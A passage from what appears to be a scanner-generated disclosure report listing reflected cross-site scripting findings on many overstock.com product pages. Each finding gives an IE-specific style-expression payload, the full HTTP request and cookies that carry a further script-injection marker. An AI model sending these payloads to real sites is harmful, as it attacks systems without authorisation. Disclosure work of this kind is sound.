GET /Clothing-Shoes/Rocket-Dog-Womens-Chestnut-Mid-calf-Boots/4469409/product.html?179c0"style%3d"x%3aexpression(alert(1))"7a88e7a4193=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.70. http://www.overstock.com/Clothing-Shoes/Rothschild-Big-Girls-Wool-Walking-Coat-with-Matching-Hat/4745510/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 253bb"style%3d"x%3aexpression(alert(1))"2d7438fcdec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 253bb"style="x:expression(alert(1))"2d7438fcdec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Rothschild-Big-Girls-Wool-Walking-Coat-with-Matching-Hat/4745510/product.html?253bb"style%3d"x%3aexpression(alert(1))"2d7438fcdec=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.71. http://www.overstock.com/Clothing-Shoes/Rothschild-Girls-Wool-Blend-Coat-and-Hat-Set/4745019/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41b46"style%3d"x%3aexpression(alert(1))"9675ca43ed6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41b46"style="x:expression(alert(1))"9675ca43ed6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Rothschild-Girls-Wool-Blend-Coat-and-Hat-Set/4745019/product.html?41b46"style%3d"x%3aexpression(alert(1))"9675ca43ed6=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.72. http://www.overstock.com/Clothing-Shoes/Ruby-Womens-Ruche-Dress/4662671/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77013"style%3d"x%3aexpression(alert(1))"cc09ed7b953 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 77013"style="x:expression(alert(1))"cc09ed7b953 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Ruby-Womens-Ruche-Dress/4662671/product.html?77013"style%3d"x%3aexpression(alert(1))"cc09ed7b953=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.73. http://www.overstock.com/Clothing-Shoes/Steve-Madden-Mens-Bigg-Slip-on-Loafers/4224471/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93964"style%3d"x%3aexpression(alert(1))"917236cdfca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 93964"style="x:expression(alert(1))"917236cdfca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Steve-Madden-Mens-Bigg-Slip-on-Loafers/4224471/product.html?93964"style%3d"x%3aexpression(alert(1))"917236cdfca=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.74. http://www.overstock.com/Clothing-Shoes/Steve-Madden-Mens-Dutch-Low-Boots/4050883/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3702"style%3d"x%3aexpression(alert(1))"896647dec7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c3702"style="x:expression(alert(1))"896647dec7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Steve-Madden-Mens-Dutch-Low-Boots/4050883/product.html?c3702"style%3d"x%3aexpression(alert(1))"896647dec7d=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.75. http://www.overstock.com/Clothing-Shoes/Steven-by-Steve-Madden-Womens-Link-Leather-Boots/5113676/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5502"style%3d"x%3aexpression(alert(1))"44ef05ee2ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5502"style="x:expression(alert(1))"44ef05ee2ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Steven-by-Steve-Madden-Womens-Link-Leather-Boots/5113676/product.html?e5502"style%3d"x%3aexpression(alert(1))"44ef05ee2ed=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.76. http://www.overstock.com/Clothing-Shoes/Tommy-Hilfiger-Womens-Down-Filled-Jacket/5230221/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc162"style%3d"x%3aexpression(alert(1))"b5cde70494e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc162"style="x:expression(alert(1))"b5cde70494e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Tommy-Hilfiger-Womens-Down-Filled-Jacket/5230221/product.html?bc162"style%3d"x%3aexpression(alert(1))"b5cde70494e=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.77. http://www.overstock.com/Clothing-Shoes/Trotta-Pagano-Womens-Lucetta-Italian-Leather-Knee-high-Boots/5108339/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78e64"style%3d"x%3aexpression(alert(1))"6d0eb2c7d50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 78e64"style="x:expression(alert(1))"6d0eb2c7d50 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Trotta-Pagano-Womens-Lucetta-Italian-Leather-Knee-high-Boots/5108339/product.html?78e64"style%3d"x%3aexpression(alert(1))"6d0eb2c7d50=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.78. http://www.overstock.com/Clothing-Shoes/U-I-Mens-Solid-Black-Suit/3142267/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b093d"style%3d"x%3aexpression(alert(1))"48619d077d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b093d"style="x:expression(alert(1))"48619d077d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/U-I-Mens-Solid-Black-Suit/3142267/product.html?b093d"style%3d"x%3aexpression(alert(1))"48619d077d1=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.79. http://www.overstock.com/Clothing-Shoes/Urban-Eyes-Aviator-Womens-Sunglasses/4878052/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9552e"style%3d"x%3aexpression(alert(1))"a9a967e2da5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9552e"style="x:expression(alert(1))"a9a967e2da5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Urban-Eyes-Aviator-Womens-Sunglasses/4878052/product.html?9552e"style%3d"x%3aexpression(alert(1))"a9a967e2da5=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.80. http://www.overstock.com/Clothing-Shoes/Wayfarer-Mens-Plastic-Sunglasses/4081944/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7a7e"style%3d"x%3aexpression(alert(1))"95e7139af68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f7a7e"style="x:expression(alert(1))"95e7139af68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Wayfarer-Mens-Plastic-Sunglasses/4081944/product.html?f7a7e"style%3d"x%3aexpression(alert(1))"95e7139af68=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.81. http://www.overstock.com/Crafts-Sewing/Brother-CE5000-Project-Runway-Sewing-Machine-Refurbished/4254548/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9e70"style%3d"x%3aexpression(alert(1))"e7ffcc6a332 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e9e70"style="x:expression(alert(1))"e7ffcc6a332 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Crafts-Sewing/Brother-CE5000-Project-Runway-Sewing-Machine-Refurbished/4254548/product.html?e9e70"style%3d"x%3aexpression(alert(1))"e7ffcc6a332=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.82. http://www.overstock.com/Crafts-Sewing/Brother-CE5500PRW-50-stitch-Project-Runway-Sewing-Machine-Refurbished/5146644/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a7c0"style%3d"x%3aexpression(alert(1))"55a54c4c9d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6a7c0"style="x:expression(alert(1))"55a54c4c9d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Crafts-Sewing/Brother-CE5500PRW-50-stitch-Project-Runway-Sewing-Machine-Refurbished/5146644/product.html?6a7c0"style%3d"x%3aexpression(alert(1))"55a54c4c9d8=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.83. http://www.overstock.com/Crafts-Sewing/Brother-LX-3125-Sewing-Machine/4395190/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9deef"style%3d"x%3aexpression(alert(1))"ea5e7c90a99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9deef"style="x:expression(alert(1))"ea5e7c90a99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
